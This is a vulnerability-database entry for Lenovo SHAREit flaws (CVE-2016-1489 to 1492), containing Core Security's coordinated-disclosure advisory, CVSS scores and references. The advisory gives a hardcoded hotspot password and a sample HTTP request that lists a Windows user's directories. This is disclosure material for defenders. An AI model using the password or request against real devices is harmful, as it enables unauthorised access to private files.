[CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files.
7.4. An attacker could connect to that HotSpot and capture the information transferred between those devices.
- Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References
[1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com.
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0463",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "shareit",
"scope": "eq",
"trust": 1.6,
"vendor": "lenovo",
"version": "3.0.18_ww"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.5.48_ww (android)"
},
{
"model": "shareit for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for android 3.0.18 ww",
"scope": null,
"trust": 0.3,
"vendor": "lenovo",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
},
{
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lenovo:shareit",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ivan Huertas from Core Security Consulting Team.",
"sources": [
{
"db": "BID",
"id": "81748"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1492",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "CVE-2016-1492",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "VHN-90311",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2016-1492",
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1492",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-1492",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-638",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-90311",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90311"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
},
{
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlWireless by a third party LAN (WLAN) Access rights may be obtained by using the location within the reception area. Lenovo ShareIT is prone to multiple security vulnerabilities. \nAn attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Android is a set of file sharing software based on the Android system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Android versions earlier than 3.5.48_ww. The vulnerability stems from the fact that the program does not ask for a password when it is used to receive files. 1. Advisory Information\n\nTitle: Lenovo ShareIT Multiple Vulnerabilities\nAdvisory ID: CORE-2016-0002\nAdvisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities\nDate published: 2016-01-25\nDate of last update: 2016-01-22\nVendors contacted: Lenovo\nRelease mode: Coordinated release\n\n2. Vulnerability Information\n\nClass: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]\nImpact: Security bypass, Information leak\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492\n\n \n\n3. Vulnerability Description\n\nSHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. \n\n4. Vulnerable Packages\n\nLenovo SHAREit for Android 3.0.18_ww\nLenovo SHAREit for Windows 2.5.1.1\nOther products and versions may also be affected, but they were not tested. \n\n5. Vendor Information, Solutions and Workarounds\n\nLenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. \n\nThe new version of the products can be found here [1]. \n\n6. Credits\n\nThis vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaqu\u00edn Rodr\u00edguez Varela from Core Security Advisories Team. \n\n \n\n7. Technical Description / Proof of Concept Code\n\n7.1. Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. \n\n7.2. Remote browsing of file system on Lenovo SHAREit for Windows\n\n[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:\n\n \nPOST /list?type=file\u0026path=C%3A%5CUsers\\admin HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)\nHost: 192.168.173.1:2999\nConnection: Keep-Alivek\nAccept-Encoding: gzip\nContent-Length: 0\nHTTP/1.0 200 OK\nContent-Length: 2426\n\n\n{\"containers\":[{\"filepath\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Contacts\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Desktop\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Documents\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Documents\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Documents\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Downloads\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Favorites\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Links\",\n\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Links\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Links\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Music\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Music\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nMusic\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nPictures\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Saved\nGames\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Searches\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Searches\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Searches\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Tracing\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Videos\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Videos\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\n\",\"type\":\"file\",\"ver\":\"\"}],\"filepath\":\"C:\\\\Users\\\\admin\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\",\"isloaded\":true,\"isroot\":false,\"isvolume\":false,\"name\":\"admin\",\"type\":\"file\",\"ver\":\"\"}\n \n7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit\n\n[CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files. \n\n7.4. An attacker could connect to that HotSpot and capture the information transferred between those devices. \n\n \n\n8. Report Timeline\n\n2015-10-29: Core Security sent an initial notification to Lenovo. \n2015-10-29: Lenovo replied attaching their public PGP key. \n2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. \n2015-10-29: Lenovo replied their development team would review Core Security findings. \n2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. \n2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. \n2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. \n2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. \n2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. \n2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. \n2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. \n2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. \n2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. \n2015-11-23: Lenovo informed Core Security that they had forwarded Core\u0027s analysis to their development team. \n2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the \"secure mode\" and only used in the \"easy mode\". \n2015-12-06: Lenovo informed Core Security that they were still working on the schedule. \n2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. \n2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. \n2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. \n2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. \n2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn\u0027t planned a date for their advisory disclosure. \n2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. \n2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core\u0027s advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn\u0027t meet the Monday 11 deadline. \n2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. \n2016-01-06: Core Security sent Lenovo the draft version of the advisory. \n2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. \n2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. \n2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February\n2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. \n2016-01-08: Lenovo informed Core Security that they agreed to our terms. \n2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. \n2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. \n2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. \n2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. \n2016-01-19: Lenovo informed Core Security that they agreed to our request. \n2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. \n2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. \n2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. \n2016-01-25: Advisory CORE-2016-0002 published. \n9. References\n\n[1] http://shareit.lenovo.com/#DOWNLOAD. \n[2] http://www.lenovo.com. \n\n10. About CoreLabs\n\nCoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. \n\n11. About Core Security Technologies\n\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company\u0027s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. \n\n12. Disclaimer\n\nThe contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1492"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "VULHUB",
"id": "VHN-90311"
},
{
"db": "PACKETSTORM",
"id": "135378"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1492",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "135378",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-638",
"trust": 0.7
},
{
"db": "BID",
"id": "81748",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-90311",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90311"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
},
{
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"id": "VAR-201601-0463",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-90311"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:21:09.788000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LEN-4058",
"trust": 0.8,
"url": "https://support.lenovo.com/jp/ja/product_security/len_4058"
},
{
"title": "Lenovo SHAREit Wifi hotspot Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59953"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-284",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90311"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2016/jan/67"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/135378/lenovo-shareit-information-disclosure-hardcoded-password.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1492"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1492"
},
{
"trust": 0.3,
"url": "http://www.lenovo.com/ca/en/"
},
{
"trust": 0.1,
"url": "http://shareit.lenovo.com/#download."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1492"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1490"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1491"
},
{
"trust": 0.1,
"url": "http://www.lenovo.com."
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90311"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
},
{
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"sources": {
"@context": {
